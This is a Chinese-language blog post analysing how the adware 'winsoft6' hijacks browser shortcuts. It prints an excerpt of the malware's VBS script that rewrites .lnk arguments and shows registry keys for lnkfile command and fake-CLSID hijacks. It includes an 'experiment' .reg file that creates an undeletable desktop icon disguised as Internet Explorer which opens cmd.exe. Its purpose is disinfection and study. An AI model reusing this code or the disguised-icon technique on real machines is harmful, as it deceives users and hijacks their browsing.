// by redice 2010.05.08
// redice@163.com

什么是“网页快捷方式劫持”？

相信不少遭受过流氓软件危害的人都有过这样的经历，不经意安装了流氓软件后，
打开网页快捷方式（目标路径为网址的快捷方式）会被劫持到了一个流氓站点（通常目标站是网址导航类的站点）。
我称这种现象为“网页快捷方式劫持”（浏览器默认首页被修改不属于该范围）。

（1）“网页快捷方式劫持”之常规伎俩。

快捷方式的目标路径被修改了。这是最简单的方法，也是最笨的方法。
我遇到的流氓软件winsoft6，它目录下有个3.vbs文件，这个文件的功能就是将一些系统特殊目录（桌面，启动菜单，开始菜单等）下的
网页快捷方式目标路径修改为恶意站点的地址。

摘录3.vbs部分代码如下（狼子野心，昭然若揭...）：


Set WshShell = WScript.CreateObject("WScript.Shell")
strDesktop = WshShell.SpecialFolders("Desktop") :特殊文件夹“桌面”
Favorites = WshShell.SpecialFolders("Favorites") :特殊文件夹“桌面”

strttWinDir = WshShell.ExpandEnvironmentStrings("%ProgramFiles%")
iescc=strttWinDir&"Internet Exploreriexplore.exe"
ssd="粘贴"
winds = WshShell.ExpandEnvironmentStrings("%SystemRoot%")

Set oShellLink = WshShell.CreateShortcut(WshShell.SpecialFolders("AllUsersStartMenu") +"程"&"序启"&"动腾讯QQ.lnk" )
oShellLink.TargetPath = "%Program"&"Files%winsoft622"&"22.vbs" : 目标
oShellLink.IconLocation = "%ProgramFiles%winsoft6qq.ico, 0" : 图标
oShellLink.WorkingDirectory = "%ProgramFiles%winsoft6" : 起始位置
oShellLink.Save : 创建保存快捷方式

Sub Doits12345(lnktz)
Dim oldpath,newpath
oldpath = lnktz           
Dim Wsh,fso
newpath = """"&strttWinDir&"Common Fileswinie6.html"""
Set Wsh = WScript.CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")

Dim Folders
Folders = Wsh.SpecialFolders("AllUsersDesktop")
   Set f = fso.GetFolder(Folders)
   Set fc = f.Files
   For Each f1 in fc
      ext = LCase(fso.GetExtensionName(f1))
      if ext = "lnk" then
           Set oShlnk = Wsh.CreateShortcut(f1)
        If Instr(oShLnk.TargetPath,oldpath) > 0 Then
       oShLnk.Arguments = newpath
       oShLnk.Save      
End If
   Set oShLnk=NoThing
      end if
   Next
   （省略部分代码......）
Set WSH = Nothing
End Sub

Call Doits12345("TTraveler"&".exe")
Call Doits12345("SogouExplorer.exe")
Call Doits12345("TheWorld.exe")
Call Doits12345("Maxthon.exe")
Call Doits12345("Maxthon2.exe")
Call Doits12345("360SE"&".exe")

WScript.quit


清除方法：通过查看快捷方式的属性很容易发现和修复，这个没什么JS含量，不足为奇。

（2）“网址快捷方式劫持”之印象劫持:

现象：

网页快捷方式的目标路径没有被修改，打开快捷方式会被劫持到恶意站点。
直接运行浏览器主程序（在浏览器目录下直接运行）也会被劫持，通常常见的浏览器（iexplorer.exe,firefox.exe,Maxthon.exe）都被劫持了。

原理及解决方案：

浏览器进程被印象劫持了，删除注册表中相应的印象劫持项即可
（在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options下找到浏览器进程名对应的项，删除即可）。
也可以用注册表搜索工具搜索恶意网站的地址，就可以找到（不要加http://）对应的映像劫持项，然后删除它们。

深度GHOSTXP2010贺岁珍藏版就存在这个问题，详情可以查看我的这篇文章《去掉“深度GHOSTXP2010贺岁珍藏版”浏览器映像劫持》，
http://www.redicecn.cn/view-208.html。


（3）“网页快捷方式劫持”之深度隐藏（最恶毒的手段）:


现象一：

网页快捷方式的目标路径没有被修改，打开快捷方式会被劫持到某站点。直接运行浏览器主程序却正常（不会被劫持）。
不管是以前创建的还是新建的，打开都会被劫持。
而其在注册表中根本搜索不到对应的网址（深度隐藏啊）。
我遇到的流氓软件winsoft6，它目录下有个test.exe文件，运行后就会出现这个问题。

原理及解决方案：

查看注册表HKEY_CLASSES_ROOTlnkfile项，发现其中多出了shellopencommand子项，
command项的默认值为"C:WINDOWSSystem32WScript.exe" "C:Program FilesNetMeetingNod32.jse" "%1" %*，
这个配置参数的含义就是当我们双击快捷方式的时候，系统就会调用参数中的程序（这里是通过系统的脚本解释器运行了Nod32.jse）。

PS：有兴趣可以分析一下C:Program FilesNetMeetingNod32.jse这个js文件，感觉写的很有水平。

解决方法：删除HKEY_CLASSES_ROOTlnkfileshellopencommand项，恢复lnkfile项的默认值（导入如下注册表文件）。


Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT.lnk]

@="lnkfile"

[HKEY_CLASSES_ROOT.lnkShellEx]

[HKEY_CLASSES_ROOT.lnkShellEx{000214EE-0000-0000-C000-000000000046}]

@="{00021401-0000-0000-C000-000000000046}"

[HKEY_CLASSES_ROOT.lnkShellEx{000214F9-0000-0000-C000-000000000046}]

@="{00021401-0000-0000-C000-000000000046}"

[HKEY_CLASSES_ROOT.lnkShellEx{00021500-0000-0000-C000-000000000046}]

@="{00021401-0000-0000-C000-000000000046}"

[HKEY_CLASSES_ROOT.lnkShellEx{BB2E617C-0920-11d1-9A0B-00C04FC2D6C1}]

@="{00021401-0000-0000-C000-000000000046}"

[HKEY_CLASSES_ROOT.lnkShellNew]

"Command"="rundll32.exe appwiz.cpl,NewLinkHere %1"

[HKEY_CLASSES_ROOTlnkfile]

@="快捷方式"

"EditFlags"=dword:00000001

"IsShortcut"=""

"NeverShowExt"=""

[HKEY_CLASSES_ROOTlnkfileCLSID]

@="{00021401-0000-0000-C000-000000000046}"

[HKEY_CLASSES_ROOTlnkfileshellex]

[HKEY_CLASSES_ROOTlnkfileshellexContextMenuHandlers]

[HKEY_CLASSES_ROOTlnkfileshellexContextMenuHandlersOffline Files]

@="{750fdf0e-2a26-11d1-a3ea-080036587f03}"

[HKEY_CLASSES_ROOTlnkfileshellexContextMenuHandlers{00021401-0000-0000-C000-000000000046}]

[HKEY_CLASSES_ROOTlnkfileshellexDropHandler]

@="{00021401-0000-0000-C000-000000000046}"

[HKEY_CLASSES_ROOTlnkfileshellexIconHandler]

@="{00021401-0000-0000-C000-000000000046}"

[HKEY_CLASSES_ROOTlnkfileshellexPropertySheetHandlers]

[HKEY_CLASSES_ROOTlnkfileshellexPropertySheetHandlersShimLayer Property Page]

@="{513D916F-2A8E-4F51-AEAB-0CBC76FB1AF8}"


附lnkfile.reg
File: Click to Download

现象二：

桌面多出一个Internet Explorer图标，查看属性和系统IE属性完全一样，主页也未被修改，双击打开的却是恶意站点。
也就是说多出来了一个恶意的Internet Explorer图标，无法删除（自定义桌面和桌面清理中都无法将其删除）。
而其在注册表中根本搜索不到对应的网址。
我遇到的流氓软件winsoft6，它目录下有个ie2.exe文件，运行后就会出现这个问题。

原理及解决方案：

恶意程序在HKEY_CLASSES_ROOTCLSID下注册（新建）了一个新的CLSID，并将其伪装成Internet Explorer，然后将其添加到
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace下。

PS：HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace下添加的CLSID都会在桌面上显示。

挨个打开DesktopNameSpace下的CLSID项，并定位到HKEY_CLASSES_ROOTCLSID下，通过查看很容易发现如下的可疑项：

HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}ShellOpen(&O)Command 的默认值为

C:Program FilesInternet ExplorerConnection Wizardiexplore.exe %1 h%t%t%p:%//%w%w%w.%15%18%16dh.%c%o%m

看来那个恶意IE图标就是{e17d4fc0-5564-11d1-83f2-00a0c90dc849}这个CLSID所对应的项。

删除HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}和
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace{e17d4fc0-5564-11d1-83f2-00a0c90dc849}
桌面多出的IE图标就消失了。

做一个有趣的实验：

目的：在桌面上创建一个系统图标，该图标无法被直接删除，打开属性页显示Internet属性，双击打开cmd.exe。
步骤：

（1）在HKEY_CLASSES_ROOTCLSID下新建一个CLSID项，导入如下注册表文件即可。

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}]
@="Internet Explorer"

[HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}DefaultIcon]
@="cmd.exe"

[HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}Shell]

[HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}ShellOpen(&O)]
@="Open(&O)"

[HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}ShellOpen(&O)Command]
@="cmd.exe"

[HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}Shell属性(&R)]

[HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}Shell属性(&R)Command]
@="rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0"

[HKEY_CLASSES_ROOTCLSID{e17d4fc0-5564-11d1-83f2-00a0c90dc849}ShellFolder]
"Attributes"=dword:00000000
@="HideOnDesktopPerUser"


（2）在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace下添加{e17d4fc0-5564-11d1-83f2-00a0c90dc849}项。

结果：桌面上多出了一个cmd.exe的图标，名称是Internet Explorer，双击打开cmd.exe，右键属性打开的是Internet属性页。

ok，试验成功。

三种（准确说应该是四种）网页快捷方式劫持的方法到这里就分析完毕了。
这些都是我对winsoft6中恶意程序分析的结果，Registry Workshop（一个精悍的注册表编辑工具）帮了不少忙。

附流氓软件winsoft6，有兴趣大家也可以研究一下。
File: Click to Download

本文txt版：
File: Click to Download